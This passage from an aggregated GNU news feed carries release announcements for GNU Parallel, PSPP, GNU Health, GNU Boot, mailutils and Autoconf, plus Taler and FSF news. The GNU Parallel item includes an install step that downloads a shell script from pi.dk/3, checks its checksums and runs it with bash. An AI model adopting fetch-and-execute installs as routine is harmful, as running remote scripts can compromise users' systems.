GNU/Linux distribution, Guix offers a declarative, stateless approach to
operating system configuration management. Guix is highly customizable
and hackable through <a href="https://www.gnu.org/software/guile">Guile</a>
programming interfaces and extensions to the
<a href="http://schemers.org">Scheme</a> language.</p>2024-01-19T15:00:00+00:00Steve Georgewww @ Savannah: The Moral and the Legal
https://savannah.gnu.org/news/?id=10580
<p>New article by Richard Stallman: <a href="https://www.gnu.org/philosophy/the-moral-and-the-legal.html">https://www.gnu.org/philosophy/the-moral-and-the-legal.html</a><br />
</p>2024-01-17T10:56:34+00:00Jing LuoGNU Taler news: New EU project NGI TALER will bring private and secure online payments to the Eurozone
https://taler.net/en/news/2024-02.html
<article>
We are excited to announce the creation of a European project December 1st 2023, which will run for the next 36 months. This Next Generation Internet pilot named "NGI TALER" is operated by a consortium of 11 partners from 8 European countries with the mandate to roll out an innovative electronic payment system for the greater benefit of European citizens, merchants, and banks. This payment system is different from current online payment methods, like credit cards or bank transfers, in that it offers privacy for the buyer: neither merchants nor banks can trace or link the payments. It is also a no-risk payment option for the merchant as there is no equivalent of fake or stolen credit cards, as payments are cleared and confirmed instantly. The payment system is socially, ecologically and fiscally responsible: it is not a new currency, there is no energy-consuming proof-of-work or proof-of-stake method and clearing is processed much faster than payments by credit cards. NGI TALER enforce [...]
</article>2024-01-16T23:00:00+00:00GNU Taler newsremotecontrol @ Savannah: Another home thermostat found vulnerable to attack
https://savannah.gnu.org/news/?id=10579
<p><a href="https://www.foxnews.com/tech/another-home-thermostat-found-vulnerable-to-attack">https://www.foxnews.com/tech/another-home-thermostat-found-vulnerable-to-attack</a>
<br />
<br />
A network cable connection to any thermostat is still a safer and overall less expensive long term choice.<br />
</p>2024-01-15T16:31:08+00:00Stephen H. Dawson DSLGNU Taler news: NGI Taler project launched
https://taler.net/en/news/2024-01.html
<article>
We are excited to announce the creation of an EU-funded consortium with the central objective to launch GNU Taler as a privacy-preserving payment system across Europe. You can find more information on the consortium page.
</article>2024-01-14T23:00:00+00:00GNU Taler newscpio @ Savannah: GNU cpio version 2.15
https://savannah.gnu.org/news/?id=10578
<p>GNU cpio version 2.15 is <a href="https://ftp.gnu.org/gnu/cpio/cpio-2.15.tar.gz">available for download</a>. This is a bug-fixing release. Short summary of changes:
<br />
<br />
</p>
<ul>
<li>Fix the operation of --no-absolute-filenames --make-directories.
</li>
<li>Restore access and modification times of symlinks in copy-in and copy-pass modes.
</li>
</ul>2024-01-14T12:21:41+00:00Sergey PoznyakoffFSF News: FSF job opportunity: Outreach and communications coordinator
http://www.fsf.org/news/fsf-job-opportunity-outreach-and-communications-coordinator
The Free Software Foundation (FSF), a Massachusetts 501(c)(3)
charity with a worldwide mission to protect computer user freedom,
seeks a motivated and talented individual, if possible Boston-based, to be our
full-time outreach and communications coordinator.2024-01-12T20:49:22+00:00FSF Newsmicron @ Savannah: Version 1.4
https://savannah.gnu.org/news/?id=10577
<p>GNU micron version 1.4 is <a href="https://download.gnu.org.ua/pub/release/micron/micron-1.4.tar.gz">available for download</a>.<br />
</p>2024-01-08T21:08:31+00:00Sergey Poznyakoffmailutils @ Savannah: GNU mailutils version 3.17
https://savannah.gnu.org/news/?id=10576
<p>GNU mailutils version 3.17 is <a href="https://ftp.gnu.org/gnu/mailutils/">available for download</a>. This is a maintenance release, including some new features:
<br />
<br />
</p>
<h4>Use of TLS in pop3d and imap4d</h4>
<p>
<br />
If not explicitly specified, the TLS mode to use (<b>ondemand</b>, <b>connect</b>, etc.) is derived from the configured port. E.g., for <b>imap4d</b>, port 143 implies <b>ondemand</b> mode, and port 993 implies <b>connection</b> mode.
<br />
<br />
The global <b>tls-mode</b> setting is used only when the mode cannot be determined otherwise, i.e. neither per-server <b>tls-mode</b> is given nor the port gives any clues as to the TLS mode to use.<br />
</p>2024-01-06T15:20:17+00:00Sergey Poznyakoffanubis @ Savannah: GNU anubis version 4.3
https://savannah.gnu.org/news/?id=10575
<p>GNU anubis version 4.3 is <a href="https://ftp.gnu.org/gnu/anubis/">available for download</a>. This is a maintenance release, including some new features:
<br />
<br />
</p>
<h4>anubisusr requires GnuTLS</h4>
<p>
<br />
</p>
<h4>New configuration statement: use-pam</h4>
<p>
<br />
Used in <b>CONTROL</b> section, this boolean statement enables or disables the use of the Pluggable Authentication Module interface for accounting and session management.
<br />
<br />
</p>
<h4>New configuration statement: identd-keyfile</h4>
<p>
<br />
Sets the name of the file with shared keys used for decrypting replies from the <b>auth</b> service. It is used in traditional mode if <b>anubis</b> receives an encrypted response from the client's identd server (e.g. if they are running <b>pidentd</b> with encryption).<br />
</p>2024-01-06T11:42:46+00:00Sergey PoznyakoffLuca Saiu: Languages and complexity, Part I: why I love Anki
https://blog.ageinghacker.net/posts/35/
Lately I have not been as active in GNU (https://www.gnu.org) as I would have liked—which I plan to change. Apart from work I was busy with happy family life next to E.; and, I guess, with contemplating the dismal state of the West as it descends further and further into tyranny amid the general indifference. Maybe in part seeking solace from the news I focused with renewed intensity on my hobby, studying the Russian language for no reason much more practical than my love for Nineteenth-Century novels. I have heard more than one Russian teacher vocally disapproving of literature as ... <a href="https://blog.ageinghacker.net/posts/35/">[Read more]</a>2024-01-02T18:47:00+00:00Luca Saiuwww-zh-cn @ Savannah: Summary 2023
https://savannah.gnu.org/news/?id=10573
<p>Dear CTT translators:
<br />
<br />
Thank you very much for your contribution in the past year.
<br />
We have done a good job as always.
<br />
<br />
1. keep on localizing <a href="https://www.gnu.org">www.gnu.org</a> to Simplified Chinese
<br />
2. help review the new translation of GNU licence: GFDL
<br />
3. welcomed several new members, including Jing
<br />
4. welcomed several contributors: Ventus Uta, Peaksol, and Chen Jingge
<br />
<br />
The following is the summary from GNU. Please take you time to read.
<br />
<br />
Dear GNU translators!
<br />
<br />
2023 was a very quiet year; the total number of new translations
<br />
was four times as low as in 2022, and in terms of size the amount
<br />
was twice as low. Most translations were made in the "Simplified"
<br />
Chinese and in the Turkish team. A few unmaintained translations
<br />
were decommissioned this year, so the total number of translations
<br />
didn't grow, for the first time since the start of CVS logs in 2001.
<br />
<br />
General Statistics
<br />
<br />
In most working teams, the amount of outdated translations was
<br />
unprecedently close to zero. We could only wish more teams were
<br />
active; as a result, the average percentage of outdated translations
<br />
remained as high as in 2022, and grew slowly.
<br />
<br />
The table below shows the number and size of newly translated
<br />
articles in important directories and typical number of outdated
<br />
GNUNified translations throughout the year.
<br />
<br />
+--team--+------new-----+--outdated---+
<br />
| es | 0 ( 0.0Ki) | 0.4 ( 0.2%) |
<br />
+--------+--------------+-------------+
<br />
| fa | 2 ( 29.1Ki) | 25 ( 81%) |
<br />
+--------+--------------+-------------+
<br />
| fr | 2 ( 46.8Ki) | 0.1 (0.04%) |
<br />
+--------+--------------+-------------+
<br />
| ja | 0 ( 0.0Ki) | 35 ( 25%) |
<br />
+--------+--------------+-------------+
<br />
| pl | 0 ( 0.0Ki) | 67 ( 45%) |
<br />
+--------+--------------+-------------+
<br />
| ru | 4 ( 68.6Ki) | 0.3 ( 0.1%) |
<br />
+--------+--------------+-------------+
<br />
| sq | 0 ( 0.0Ki) | 1.5 ( 2%) |
<br />
+--------+--------------+-------------+
<br />
| tr | 5 (195.1Ki) | 0.3 ( 0.2%) |
<br />
+--------+--------------+-------------+
<br />
| zh-cn | 12 (214.7Ki) | 0.8 ( 0.3%) |
<br />
+--------+--------------+-------------+
<br />
+--------+--------------+
<br />
| total | 25 (554.3Ki) |
<br />
+--------+--------------+
<br />
<br />
For the reference: 2 new articles were added, amounting to 47Ki
<br />
(which is considerably less than in 2022); the number of commits
<br />
(about 400 changes in approximately 100 English files) was just
<br />
a little lower than in 2022.
<br />
<br />
Orphaned Teams, New and Reformed Teams
<br />
<br />
No teams were orphaned, and no new teams were established.
<br />
<br />
Volunteers requested taking over the teams for Esperanto, Punjabi,
<br />
Marathi, Indonesian, Brazilian Portuguese, Arabic---in all cases
<br />
with little further outcome.
<br />
<br />
Changes in the Page Regeneration System
<br />
<br />
GNUN 1.4 was released this year, fixing a few minor bugs, updating
<br />
the HTML validation script for new xmllint, supporting localized
<br />
URLs in templates, and a configure option to reduce the number
<br />
of generated locales used for the sorting feature.
<br />
<br />
Happy GNU year, and thank you for your contributions!
<br />
<br />
Happy Hacking
<br />
wxie<br />
</p>2024-01-01T04:18:53+00:00Wensheng XIEpspp @ Savannah: PSPP 2.0.0 has been released
https://savannah.gnu.org/news/?id=10572
<p>I'm very pleased to announce the release of a new version of GNU PSPP. PSPP is a program for statistical analysis of sampled data. It is a free replacement for the proprietary program SPSS.
<br />
<br />
Changes from 1.6.2-pre2 to 2.0.0:
<br />
</p>
<ul>
<li>The CTABLES command is now implemented.
</li>
<li>FREQUENCIES now honors the LAYERED setting on SPLIT FILE.
</li>
<li>AGGREGATE:
<ul>
<li>New aggregation functions CGT, CLT, CIN, and COUT.
</li>
<li>Break variables are now optional.
</li>
</ul>
</li>
<li>ADD FILES, MATCH FILES, and UPDATE now allow string variables with the same name to have different widths.
</li>
<li>CROSSTABS now calculates significance of Pearson and Spearman correlations in symmetric measures.
</li>
<li>DISPLAY MACROS is now implemented.
</li>
<li>SET SUMMARY is now implemented.
</li>
<li>SHOW ENVIRONMENT is now implemented.
</li>
<li>Removed the MODIFY VARS command, which is not in SPSS.
</li>
<li>Building from a Git repository, which previously required GIMP, now requires rsvg-convert from librsvg2 instead.
</li>
<li>The pspp-dump-sav program is no longer installed by default.
</li>
<li>Improved the search options in the syntax editor.
</li>
<li>Localisations for the ar (Arabic) and ta (Tamil) locales have been added. Other translations have been updated.
</li>
<li>Journaling is now enabled by default when PSPP or PSPPIRE is started interactively. In PSPPIRE, use Edit|Options to override the default.
</li>
</ul>
<p>Please send PSPP bug reports to bug-gnu-pspp@gnu.org.<br />
</p>2023-12-31T23:20:11+00:00Ben Pfaffgnuboot @ Savannah: GNU Boot December 2023 News
https://savannah.gnu.org/news/?id=10571
<h2>GNU Boot December 2023 News</h2>
<p>
<br />
</p>
<h3>Announcements:</h3>
<p>
<br />
The last project announcement was made in the gnuboot mailing
<br />
list[1][2] at a time where we didn't have a website or an announce
<br />
mailing list yet.
<br />
<br />
So this announce and the next ones will be published in multiple
<br />
places:
<br />
<br />
- On the gnuboot[3] and gnuboot-announce[4] mailing lists
<br />
<br />
- On the GNU Boot website[5].
<br />
<br />
</p>
<h3>GNU Boot 0.1 RC3:</h3>
<p>
<br />
We just released GNU Boot 0.1 RC3. We also need help from testers for
<br />
this release, especially because few intrusive changes were made.
<br />
<br />
We also release GNU Boot 0.1 RC2 just before but some bugs that don't
<br />
affect the installable images were introduced in the last minute fixes
<br />
so we ended up making an RC3 as well (some tests were broken and some
<br />
website pages also needed fixes).
<br />
<br />
</p>
<h3>Nonfree software found in the source release of GNU Boot 0.1 RC1.</h3>
<p>
<br />
In the GNU Boot source release (gnuboot-0.1-rc1_src.tar.xz) we found
<br />
the 3 files (F12MicrocodePatch03000002.c, F12MicrocodePatch0300000e.c,
<br />
F12MicrocodePatch03000027.c) that contain microcode in binary form,
<br />
without corresponding source code. GNU Boot 0.1 RC1 corresponding
<br />
source code tarball was remade without these files (and renamed). The
<br />
images for the Asus KCMA-D8, KFSN4-DRE and KGPE-D16 were also removed
<br />
as they may contain the nonfree code as well. The rest of the files
<br />
are unaffected.
<br />
<br />
</p>
<h3>Website:</h3>
<p>
<br />
Since the last announce a lot of work was done on the code to deploy
<br />
the website to make to make it easy for contributors and maintainers
<br />
to do changes to the website and review them.
<br />
<br />
The website has also been published. Not everything is ready in
<br />
it, but it contains enough to understand how to contribute to GNU Boot.
<br />
<br />
The pages that are not ready yet were also published with a special
<br />
banner to indicate that.
<br />
<br />
Since we now have a website, contribution instructions[6], and even a
<br />
list of areas where we are looking for contributions[6], we can now
<br />
accept patches.
<br />
<br />
The website is also now integrated in the GNU Boot source code and we
<br />
have special code to make it easy to test it locally (and deploy it
<br />
semi-automatically). So it should make contributions easier.
<br />
<br />
</p>
<h3>Testing:</h3>
<p>
<br />
We would also like to thank all the people who tested GNU Boot 0.1 RC1
<br />
since the last announce, especially since this can be a lot of
<br />
work, especially because there are many computers to test.
<br />
<br />
The following computers were tested with GNU Boot 0.1 RC1 and they all
<br />
boot fine:
<br />
</p>
<ul>
<li>Lenovo Thinkpad R400, T400, T500, T60, W500, X60, X60T, X200, X301
</li>
<li>Asus: KGPE-D16
</li>
<li>Apple: MacBook 2.1
</li>
</ul>
<p>
<br />
Since some popular computers were tested[7], we are now also looking
<br />
for testers and contributions on the installation instructions. Even
<br />
if GNU Boot 0.1 RC3 has already been published, it's probably easier
<br />
to do the tests with GNU Boot 0.1 RC1 and a computer that was already
<br />
tested (unless the computer is an Asus KCMA-D8, see above for more
<br />
details) as there is no changes that could affect the installation
<br />
instructions between 0.1 RC1 and 0.1 RC3.
<br />
<br />
The following computers / mainboards weren't tested yet with the 0.1
<br />
RC1 yet so we also need testers for them (ideally on the 0.1 RC3):
<br />
<br />
</p>
<ul>
<li>Chromebook: C201
</li>
<li>Intel: D410PT, D510MO, D945GCLF2D
</li>
<li>Gigabyte: D945GCLF, GA-G41M-ES2L
</li>
<li>Asus: KCMA-D8, KFSN4-DRE
</li>
<li>Apple: MacBook 1.1, iMac 5,2
</li>
<li>Lenovo Thinkpads: R500, T400s, X60s, X200s, X200T, X60T.
</li>
</ul>
<p>
<br />
And as stated above we also need to re-test with the RC3 the computers
<br />
that were already tested with the RC1 to make sure that we didn't
<br />
break anything.
<br />
<br />
</p>
<h3>GNU Boot running nonfree software:</h3>
<p>
<br />
GNU Boot is still in its early stages and many of the directions the
<br />
project can take are still being evaluated.
<br />
<br />
So it's a good time to warn people that in some cases GNU Boot does
<br />
run nonfree software on computers other than laptops, and that it
<br />
may change in the future (we have to decide how to deal with this
<br />
problem).
<br />
<br />
The issue is that ATI and Nvidia external GPUs do contain nonfree
<br />
software. That nonfree software is stored on the card in a memory chip.
<br />
<br />
At least in some configurations[8], if such GPU is present, GNU Boot
<br />
downloads and executes that software. Then later on in the boot,
<br />
Linux-libre also downloads and execute another nonfree software from
<br />
that same GPU.
<br />
<br />
If we decide to block that (it's relatively easy to do that in GNU
<br />
Boot) then users won't be able to use such GPU anymore. If we don't
<br />
block it, many users will not know about this freedom issue and will
<br />
think that they only run free software while nonfree software is
<br />
being executed behind their back.
<br />
<br />
This is also why the FSF RYF (Respect Your freedom) certification[9] is
<br />
important: it takes care of details like that and these GPUs or systems
<br />
with such GPUs are not certified by it.
<br />
<br />
</p>
<h3>Work in progress and future directions:</h3>
<p>
<br />
Work also started to improve the build system to make it easier to
<br />
understand and contribute. We also started adding tests along the way.
<br />
<br />
Though we still use old versions of Coreboot especially for the Asus
<br />
KCMA-D8, KFSN4-DRE and KGPE D16. Compiling GNU Boot images for these
<br />
computers requires specific distributions like PureOS 10 (byzantium)
<br />
or Trisquel 10 (nabia).
<br />
<br />
We plan to try to change that after the GNU Boot 0.1 release.
<br />
<br />
To do it we plan to update the versions of the software we build (like
<br />
Coreboot, GRUB, etc) but also to progressively switch to Guix to build
<br />
more and more parts of the images.
<br />
<br />
So far we managed to use Guix to building a GRUB payload (part of
<br />
that work was already upstreamed in Guix) and to build a custom Flashrom
<br />
that can be used to do installation on the I945 Thinkpads (X60, T60,
<br />
etc) but more work is needed (code cleanup, documentation, making it
<br />
easy to use for contributors) before we can integrate that code.
<br />
<br />
Integrating it now instead of waiting for the release would increase
<br />
the risk of introducing new bugs and inconsistencies (for instance in
<br />
the documentation), and reduce the amount of help we can get, and
<br />
since it is a big task there is also the risk of never finishing
<br />
it[10]. So we chose to do that step by step without breaking the
<br />
documentation or current usage of GNU Boot.
<br />
<br />
As for the website we are currently using Untitled, a static website
<br />
generator that use files in markdown with a custom header format.
<br />
<br />
We plan to migrate at least part of the website to Texinfo to generate a
<br />
proper manual with it and we already have code to convert from the
<br />
special markdown used to Texinfo, but the conversion sometimes needs
<br />
some manual intervention.
<br />
<br />
We're also not ready yet to do that conversion as keeping the markdown
<br />
a bit longer might make it easier for contributors to help us fix the
<br />
website.
<br />
<br />
We also evaluated Haunt, a static website generator that supports
<br />
markdown and Texinfo and that is also used by Guix for their website.
<br />
<br />
We managed to validate that we could easily write code to make it use
<br />
the custom markdown used by untitled. However we didn't invest time in
<br />
trying to make it generate a website (by default it generate blog
<br />
posts), so if some people already know haunt well or want to learn it
<br />
and are interested in helping it could be very useful. For that the
<br />
best would be to contact us on the gnuboot mailing list.
<br />
<br />
This is also important because according to its author, Untitled has
<br />
some design issues (and it is written in shell scripts) and so it will
<br />
most likely be rewritten from scratch in another programming language
<br />
by its author at some point.
<br />
<br />
In the meantime we sent patches upstream to fix some of the issues we
<br />
had with it and the patches were accepted.
<br />
<br />
</p>
<h3>Toward the 0.1 release:</h3>
<p>
<br />
What is missing before we release GNU Boot 0.1 is basically more
<br />
testing and help on the website, especially the installation
<br />
instructions.
<br />
<br />
</p>
<h3>References:</h3>
<p>
<br />
<br />
[1]"Testers needed for GNU Boot 0.1 RC1".
<br />
<br />
[2]<a href="https://lists.gnu.org/archive/html/gnuboot/2023-09/msg00000.html">https://lists.gnu.org/archive/html/gnuboot/2023-09/msg00000.html</a>
<br />
<br />
[3]<a href="https://lists.gnu.org/mailman/listinfo/gnuboot">https://lists.gnu.org/mailman/listinfo/gnuboot</a>
<br />
<br />
[4]<a href="https://lists.gnu.org/mailman/listinfo/gnuboot-announce">https://lists.gnu.org/mailman/listinfo/gnuboot-announce</a>
<br />
<br />
[5]<a href="https://gnu.org/software/gnuboot/web/news/gnuboot-december-2023.html">https://gnu.org/software/gnuboot/web/news/gnuboot-december-2023.html</a>
<br />
<br />
[6]<a href="https://www.gnu.org/software/gnuboot/web/git.html">https://www.gnu.org/software/gnuboot/web/git.html</a>
<br />
<br />
[7]<a href="https://savannah.gnu.org/bugs/?64754">https://savannah.gnu.org/bugs/?64754</a>
<br />
<br />
[8]We know for sure that when SeaBIOS is used, it will download and
<br />
execute nonfree software from GPU cards that are added to the
<br />
computer. But we're not sure what happens if SeaBIOS is not
<br />
used. An easy way to find out is if the GPU works under GNU/Linux
<br />
and that the display is initialized, then at least some nonfree
<br />
bytecode has been downloaded and executed by the operating system.
<br />
<br />
[9]<a href="https://ryf.fsf.org/">https://ryf.fsf.org/</a>
<br />
<br />
[10]See "General tips on maintaining GNU software" in
<br />
<a href="https://www.gnu.org/software/maintainer-tips">https://www.gnu.org/software/maintainer-tips</a> for more details
<br />
about common issues when maintaining a new project.<br />
</p>2023-12-31T00:04:24+00:00Adrien Bourmaulthealth @ Savannah: GNU Health Hospital Management 4.4 released!
https://savannah.gnu.org/news/?id=10570
<p>Dear community:
<br />
<br />
I am very happy to announce the release of the 4.4 series from the GNU Health Hospital Management Information System (HMIS) component!
<br />
<br />
<br />
</p>
<h3>What is new in GNUHealth Hospital Management 4.4 series</h3>
<p>
<br />
The following is a summary of the main new features included in GH 4.4 .
<br />
<br />
</p>
<ul>
<li>Improve ergonomics on patient health condition model
</li>
<li>Menu for dental treatments
</li>
<li>Include synchronization with Orthanc server using Tryton scheduler
</li>
<li>Add age_str field to gnuhealth.patient.disease
</li>
<li>Refactor FHIR server
</li>
<li>Include surgery stock moves
</li>
<li>New packages health_surgery_protocols and health_stock_surgery
</li>
<li>Update documentation on existing modules
</li>
<li>Expand information and management of surgical protocols
</li>
<li>Support generate DICOM Modality Worklists
</li>
<li>Operating room scheduler
</li>
<li>QR Code bracelet / wristband in demographics. No need to enter the patient / clinical section to print the QR.
</li>
<li>pot template generator
</li>
<li>Support Stone Web Viewer and Osimis Web Viewer link.
</li>
<li>Add service_updated to health_services* packages
</li>
<li>Automatically create patient upon entering demographics
</li>
<li>Move samples/interfaces/* to script directory
</li>
<li>Add ICD-10 or ICD-11 parent to disease_categories
</li>
<li>Update functionality in Health Genetics packages
</li>
<li>Include ambulatory care reporting
</li>
<li>Support no-patient labtest
</li>
<li>Make age string returned by compute_age_from_dates function translatable.
</li>
<li>Add code field to GnuHealthTestCritearea and let lab interface script use it
</li>
<li>Write a example Interface with pandas.
</li>
</ul>
<p>
<br />
</p>
<h4>Genomics and medical genetics package</h4>
<p>
<br />
A particular mention to the health_genetics packages because major work and significant improvements have been done for this version.
<br />
I've spent quite a bit of time on this to be ready for this new release. I am confident GNU Health genetics functionality can be a valuable tool for genomics and medical genetics, both in research and clinical practice.
<br />
<br />
The following is a summary of changes in health_genetics and health_genetics_uniprot packages:
<br />
<br />
</p>
<ul>
<li>Rename gnuhealth.disease.gene model to gnuhealth.gene
</li>
<li>Rename disease_genes xml data files to human_genes
</li>
<li>Update views and references in related modules
</li>
<li>Include hgnc_id
</li>
<li>The primary key is now the HGNC identifier
</li>
<li>Add symbol aliases
</li>
<li>Update gene type selection
</li>
<li>Include locus group and type
</li>
<li>Update Gene form and tree view
</li>
<li>Include name aliases, omim, ensembl and refseq accession ids to gnuhealth.gene model
</li>
<li>Gene related proteins are now managed in main health_genetics package
</li>
<li>Update and remove obsolete references of natural variants and phenotypes
</li>
<li>Use human genes datafiles for Genome Reference Consortium Human build 38 (grch38) and alternative loci
</li>
<li>Include xrefs, protein and keywords in genetic diseases
</li>
<li>Improve field descriptions
</li>
<li>Simplify protein-related views and terms
</li>
<li>Use Inheritance pattern
</li>
<li>Include MIM reference in protein diseases tree view
</li>
<li>Use xrefs in tree view to broaden search
</li>
<li>Update protein diseases datafile
</li>
<li>Update variants phenotypes datafile to v 2023_03_june28 from Uniprot
</li>
</ul>
<p>
<br />
</p>
<h3>Upgrading from GNU Health 4.2</h3>
<p>
<br />
The GNUHealth 4.4 will benefit from the stability of using Tryton 6.0! Still, at GH level there are significant changes on the data dictionary and kernel.
<br />
<br />
As usual:
<br />
</p>
<ul>
<li>Make a <b>FULL BACKUP</b> your kernel, database and attach directories !!
</li>
<li>Follow the instructions in the manual / Wikibooks
</li>
</ul>
<p>
<br />
</p>
<h3>Development focus</h3>
<p>
<br />
In addition of the GH HMIS server, we will focus the development in the following areas of the GNU Health ecosystem:
<br />
<br />
</p>
<ul>
<li>The Documentation Portal: It's now a reality! Little by little we are integrating the information on <a href="https://docs.gnuhealth.org">https://docs.gnuhealth.org</a> . We now have a dedicated server that will host the documentation for the GNUHealth ecosystem components. The docmentation portal is a read-only resource, focusing on stability and quality. Wikibooks will work as the great community wiki that has been helping us for over a decade. Wikibooks will also work for development discussion and host the latest screenshots at Wikimedia commons.
</li>
</ul>
<p>
<br />
</p>
<ul>
<li>MyGNUHealth: The GNU Health Personal Health Record app for desktop and mobile devices is now at 2.0 and on Kivy framework! We can now port it to different platforms (Android, MacOS, ..) using pretty much the same codebase.
</li>
</ul>
<p>
<br />
<br />
</p>
<ul>
<li>Thalamus and the Federation Portal. The GNU Health Federation integrates information from many health institutions and individuals from a region or country. The GH Federation portal will allow to manage resources, as well as the main point for <b>*analytics</b>* and <b>*reporting</b>* of massive demographics and epidemiological data generated nationwide. People, health centers and research institutions will benefit from the GNU Health Federation and the GNU Health ecosystem in general.
</li>
</ul>
<p>
<br />
As always, no matter how hard we try to avoid them, there will be bugs, so please test the new system, upgrade process, languages, and give us your feedback via them via <a href="mailto:health@gnu.org">health@gnu.org</a>
<br />
<br />
The community server has been already migrated to 4.4.0, so you just need to download the GNU Health HMIS client.
<br />
<br />
<br />
Happy and Healthy Hacking!
<br />
Luis<br />
</p>2023-12-23T23:28:57+00:00Luis Falconparallel @ Savannah: GNU Parallel 20231222 ('Sundhnúkagígur') released
https://savannah.gnu.org/news/?id=10569
<p>GNU Parallel 20231222 ('Sundhnúkagígur') has been released. It is available for download at: lbry://@GnuParallel:4
<br />
<br />
Quote of the month:
<br />
<br />
Parallel is so damn good! You’ve got to use it.
<br />
-- @ThePrimeTimeagen@youtube.com
<br />
<br />
New in this release:
<br />
</p>
<ul>
<li>--combine-exec combines GNU Parallel with any executable.
</li>
<li>Bug fixes and man page updates.
</li>
</ul>
<p>
<br />
News about GNU Parallel:
<br />
</p>
<ul>
<li>The first video that seems to be completely AI generated: <a href="https://www.youtube.com/watch?v=Ie8eAhlEHOg">https://www.youtube.com/watch?v=Ie8eAhlEHOg</a>
</li>
<li>GNU Parallel and “fail immediately if any fails” problem <a href="https://antiarchitect.medium.com/gnu-parallel-and-fail-immediately-if-any-fails-problem-481ddea690ba">https://antiarchitect.medium.com/gnu-parallel-and-fail-immediately-if-any-fails-problem-481ddea690ba</a>
</li>
</ul>
<p>
<br />
GNU Parallel - For people who live life in the parallel lane.
<br />
<br />
If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
<br />
<br />
<br />
</p>
<h2>About GNU Parallel</h2>
<p>
<br />
GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.
<br />
<br />
If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.
<br />
<br />
GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.
<br />
<br />
For example you can run this to convert all jpeg files into png and gif files and have a progress bar:
<br />
<br />
parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif
<br />
<br />
Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:
<br />
<br />
find . -name '*.jpg' |
<br />
parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200
<br />
<br />
You can find more about GNU Parallel at: <a href="http://www.gnu.org/s/parallel/">http://www.gnu.org/s/parallel/</a>
<br />
<br />
You can install GNU Parallel in just 10 seconds with:
<br />
<br />
$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
<br />
fetch -o - <a href="http://pi.dk/3">http://pi.dk/3</a> ) > install.sh
<br />
$ sha1sum install.sh | grep 883c667e01eed62f975ad28b6d50e22a
<br />
12345678 883c667e 01eed62f 975ad28b 6d50e22a
<br />
$ md5sum install.sh | grep cc21b4c943fd03e93ae1ae49e28573c0
<br />
cc21b4c9 43fd03e9 3ae1ae49 e28573c0
<br />
$ sha512sum install.sh | grep ec113b49a54e705f86d51e784ebced224fdff3f52
<br />
79945d9d 250b42a4 2067bb00 99da012e c113b49a 54e705f8 6d51e784 ebced224
<br />
fdff3f52 ca588d64 e75f6033 61bd543f d631f592 2f87ceb2 ab034149 6df84a35
<br />
$ bash install.sh
<br />
<br />
Watch the intro video on <a href="http://www.youtube.com/playlist?list=PL284C9FF2488BC6D1">http://www.youtube.com/playlist?list=PL284C9FF2488BC6D1</a>
<br />
<br />
Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.
<br />
<br />
When using programs that use GNU Parallel to process data for publication please cite:
<br />
<br />
O. Tange (2018): GNU Parallel 2018, March 2018, <a href="https://doi.org/10.5281/zenodo.1146014">https://doi.org/10.5281/zenodo.1146014</a>.
<br />
<br />
If you like GNU Parallel:
<br />
</p>
<ul>
<li>Give a demo at your local user group/team/colleagues
</li>
<li>Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
</li>
<li>Get the merchandise <a href="https://gnuparallel.threadless.com/designs/gnu-parallel">https://gnuparallel.threadless.com/designs/gnu-parallel</a>
</li>
<li>Request or write a review for your favourite blog or magazine
</li>
<li>Request or build a package for your favourite distribution (if it is not already there)
</li>
<li>Invite me for your next conference
</li>
</ul>
<p>
<br />
If you use programs that use GNU Parallel for research:
<br />
</p>
<ul>
<li>Please cite GNU Parallel in you publications (use --citation)
</li>
</ul>
<p>
<br />
If GNU Parallel saves you money:
<br />
</p>
<ul>
<li>(Have your company) donate to FSF <a href="https://my.fsf.org/donate/">https://my.fsf.org/donate/</a>
</li>
</ul>
<p>
<br />
<br />
</p>
<h2>About GNU SQL</h2>
<p>
<br />
GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.
<br />
<br />
The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.
<br />
<br />
When using GNU SQL for a publication please cite:
<br />
<br />
O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.
<br />
<br />
<br />
</p>
<h2>About GNU Niceload</h2>
<p>
<br />
GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.<br />
</p>2023-12-23T18:51:53+00:00Ole Tangeautoconf @ Savannah: Autoconf 2.72 released
https://savannah.gnu.org/news/?id=10568
<p>Autoconf 2.72 has been released, see the release announcement:
<br />
<a href="https://lists.gnu.org/archive/html/autotools-announce/2023-12/msg00003.html">https://lists.gnu.org/archive/html/autotools-announce/2023-12/msg00003.html</a><br />
</p>2023-12-22T19:37:06+00:00Zack Weinberg